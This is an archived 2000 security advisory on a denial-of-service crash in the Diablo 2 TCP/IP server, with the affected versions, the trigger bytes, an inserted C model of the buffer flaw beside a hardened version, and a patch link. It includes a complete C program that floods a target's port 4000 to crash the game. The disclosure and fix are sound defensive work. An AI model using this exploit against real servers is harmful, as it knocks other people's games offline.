
spad02.txt

Posted Aug 24, 2000
Site secpoint.com

Security Point Advisories #2 - Diablo 2 TCP/IP Server has a DOS vulnerability that allows anyone who can connect on port 4000 to crash the game. Vulnerable versions: Diablo 2 1.0, 1.01, 1.02, 1.03. Fix available here.

tags | denial of service, tcp
SHA-256 | b26f84a0c7361a7edf0e302f395e9b83e79ad0422df53972120ed1b86a2807b6

      Security Point
info@secpoint.com
http://www.secpoint.com/

Advisory #002
Title: Diablo 2 TCP/IP Server DoS
Date: 21-08-00


Copyright (c) 2000 SECURITY POINT

Contents:
=========

I Disclaimer
II Introduction
III Description
IV Demonstration code
V Fix
VI Contact
VII Job Offers
VIII Greetings

I - Disclaimer:
===============

This paper is for educational purposes only. Security Point will not be
responsible for any damages whatsoever that have a connection with the
information written in this paper. There are no warranties with regard
to this information; any use of this information is at the user's own risk.

II - Introduction:
==================

We have found a vulnerability in the Diablo 2 TCP/IP Server running on port 4000.
If malformed data is sent to port 4000 while a game is running, the game
crashes. Windows itself does NOT crash.

III - Description:
==================

While playing around with Diablo 2 on port 4000, I discovered some
problems with the TCP/IP Server. When a TCP/IP game in D2 was running, and I
connected to port 4000 and sent some data, it came back with a "Diablo II Server
Error".
This bug turned out to be irregular, though.

So I began to explore the D2 TCP/IP Server some more. While listening on
port 4000 with a program and trying to create a game, I discovered that D2
sends the following data to the port if it is occupied:

RAW:
>`
>f‚?g
>eÿ§
>
>
>eÿ§
>
>
>eÿ§
>
>lûJM
>eª§
>è#+ê:Í»ÞùJM
(without the ">"'s)

Maybe this is some sort of shutdown message that D2 sends if the server
wasn't shut down properly? In this data there were 3 eÿ§'s, so I started
testing how the D2 TCP/IP Server would respond if I sent some of them. At
first there wasn't much response from the server, but if I sent:

eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§\n

some (5-10) times in a row, it came back with the following message:

---------------------------------------------------------------------------
-                        Diablo II Server Error                        -X-
---------------------------------------------------------------------------
-    /\      Assertion Failure                                            -
-   /  \     Location: C:\D2\Source\Fog\Src\QServer\Qserver98.cpp, line #272
-  /____\    Expression: nSize >= 0 && nSize < READ_BUFFER_SIZE            -
-                          ---------------                                 -
-                          -     OK      -                                 -
-                          ---------------                                 -
---------------------------------------------------------------------------

When you click OK, Diablo 2 crashes. I then tried with many more
eÿ§'s, and then I only had to send it once. If I tried with a lot of,
e.g., A's, it wouldn't crash, but if I tried with one of the other
"commands" it would also respond with the error.
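The assertion above shows the server noticing a violated read-buffer invariant only after the fact, which turns a bad client into a crash dialog. As an added example (not Blizzard's code and not from the advisory), here is a minimal C model of that bookkeeping beside a version that validates the peer-controlled length before copying; READ_BUFFER_SIZE, the reader struct and the function names are assumptions, and the 3-byte eÿ§ sequence is the 0x65 0xFF 0xA7 pattern from the capture above.

```c
#include <stdint.h>
#include <string.h>
#define READ_BUFFER_SIZE 256   /* assumed; the advisory gives no value */

typedef struct {
    uint8_t buf[READ_BUFFER_SIZE];
    int nSize;                 /* bytes buffered, not yet consumed */
} reader_t;

/* Fragile pattern: append first, rely on an assertion afterwards. Returns the
 * advisory's assertion expression; 0 means the "Assertion Failure" dialog. */
int reader_append_fragile(reader_t *r, const uint8_t *data, int len) {
    int n = r->nSize + len;
    if (n <= READ_BUFFER_SIZE)             /* only the copy is guarded... */
        memcpy(r->buf + r->nSize, data, (size_t)len);
    r->nSize = n;                          /* ...the counter is not */
    return r->nSize >= 0 && r->nSize < READ_BUFFER_SIZE;
}

/* Hardened pattern: validate the peer-controlled length against the free
 * space before touching the buffer; -1 lets the caller drop this one client
 * instead of terminating the whole server. */
int reader_append_checked(reader_t *r, const uint8_t *data, int len) {
    if (len < 0 || len > READ_BUFFER_SIZE - 1 - r->nSize)
        return -1;
    memcpy(r->buf + r->nSize, data, (size_t)len);
    r->nSize += len;
    return 0;
}

/* The 3-byte "eÿ§" sequence (0x65 0xFF 0xA7) from the advisory's capture. Both
 * floods push `repeats` copies of it without the server ever consuming them. */
static const uint8_t D2_CMD[3] = {0x65, 0xFF, 0xA7};

/* 1 if the fragile reader survives every repeat, 0 if it would assert. */
int flood_fragile(int repeats) {
    reader_t r = {{0}, 0};
    for (int i = 0; i < repeats; i++)
        if (!reader_append_fragile(&r, D2_CMD, 3)) return 0;
    return 1;
}

/* Chunks the checked reader rejected; 0 <= nSize < READ_BUFFER_SIZE always. */
int flood_checked(int repeats) {
    reader_t r = {{0}, 0};
    int rejected = 0;
    for (int i = 0; i < repeats; i++)
        if (reader_append_checked(&r, D2_CMD, 3) != 0) rejected++;
    return rejected;
}
```

With the assumed 256-byte buffer, 85 unconsumed chunks fit and the 86th is what tips the fragile reader into the assertion; the checked reader simply refuses it.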

IV - Demonstration code
=======================
/*
 * SPD2-DoS.c
 *
 * SECURITY POINT -- http://www.secpoint.com
 *
 * (C) COPYRIGHT SECURITY POINT 2000
 * All Rights Reserved
 *
 * This source code is for educational purpose ONLY, Security Point will not
 * be responsible for any damages whatsoever that have a connection with this
 * code. There are no warranties with regard to this information.
 *
 * USE AT YOUR OWN RISK, BY USING THIS PROGRAM YOU ACCEPT ALL
 * RESPONSIBILITY FOR THE RESULTS
 *
 * For questions and suggestions email info@secpoint.com
 *
 * gcc SPD2-DoS.c -o SPD2-DoS
 *
 */

#include <stdio.h>
#include <stdlib.h>          /* exit() */
#include <string.h>
#include <unistd.h>          /* write(), close() */
#include <signal.h>          /* SIGPIPE */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>       /* inet_addr(), htons() */

#define OFFSET 10000

struct sockaddr_in address;
int d2_socket;
char sendbuffer[OFFSET];

int main(int argc, char *argv[]) {
    printf("Diablo 2 TCP/IP Server DoS, by http://www.secpoint.com\n");
    if (argc != 2) {
        printf("Usage: %s ip\n", argv[0]);
        exit(0);
    }
    if ((d2_socket = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        exit(0);
    }
    address.sin_family = AF_INET;
    address.sin_addr.s_addr = inet_addr(argv[1]);
    address.sin_port = htons(4000);
    if (connect(d2_socket, (struct sockaddr *)&address, sizeof(address)) < 0) {
        perror("connect");
        exit(0);
    }
    /* The buffer is filled with 0x60 ('`'), the first byte of the captured
     * data, and written until the server stops accepting it. The whole
     * buffer is sent by size: there is no terminator for strlen() to find. */
    signal(SIGPIPE, SIG_IGN);   /* a closed peer ends the loop, not the program */
    memset(sendbuffer, 0x60, sizeof(sendbuffer));
    while (write(d2_socket, sendbuffer, sizeof(sendbuffer)) > 0)
        ;
    close(d2_socket);
    printf("server killed\n");
    return 0;
}

V - Fix:
========
Vulnerable versions: Diablo 2 1.0, 1.01, 1.02, 1.03
Download the new patch from blizzard.com:
(http://www.blizzard.com/support/diablo2/information/patch.shtml)

VI - Contact:
=============

If you have further questions regarding this bug, then you can contact us at
www.secpoint.com
info@secpoint.com

VII - Job Offers:
=================
We are looking for people for:
Penetration testing of Firewalls and TCP/IP based networks.
You must have a wide knowledge of TCP/IP protocols and applications, plus solid
technical experience of UNIX or Windows NT.
The best candidate will have security experience in one or more of the
following:

· Penetration testing.
· Linux and other network operating systems.
· Web technologies: HTML, XML, JavaScript, Java, PHP, and ASP.
· Firewall, VPN and intrusion detection integration.
· Product certs and other forms of education.
· Routers, hubs, switches.


Finally, successful candidates must have the ability to take on responsibility
and work unsupervised in our offices and on customer sites. They must also be
able to communicate their findings to client staff via written reports and
presentations.
Another important factor is that you have a CLEAN criminal record.

Send your CV to info@secpoint.com (in MS Word, PDF or plain text formats)

http://www.secpoint.com


VIII - Greetings:
=================
: SecurityFocus.com, ADM
